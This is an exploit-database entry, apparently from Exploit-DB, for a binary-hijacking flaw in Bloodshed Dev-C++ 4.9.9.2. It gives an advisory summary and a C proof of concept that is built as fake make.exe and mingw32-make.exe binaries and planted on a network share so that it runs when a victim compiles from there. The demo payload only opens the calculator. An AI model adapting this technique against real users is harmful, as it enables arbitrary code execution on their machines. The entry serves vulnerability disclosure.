Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Executions

Author: storm
type: remote
platform: windows
port: 
date_added: 2010-08-25 
date_updated: 2014-09-05 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

// source: https://www.securityfocus.com/bid/42737/info

Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file.

Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected.

/*
Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 4.9.9.2
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -o make.exe Dev-C++-Binary.c
gcc -o mingw32-make.exe Dev-C++-Binary.c

...and place in appropriate directory.  Executes your code four times.

Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected.  Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.

*/

#include <windows.h>

int main()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}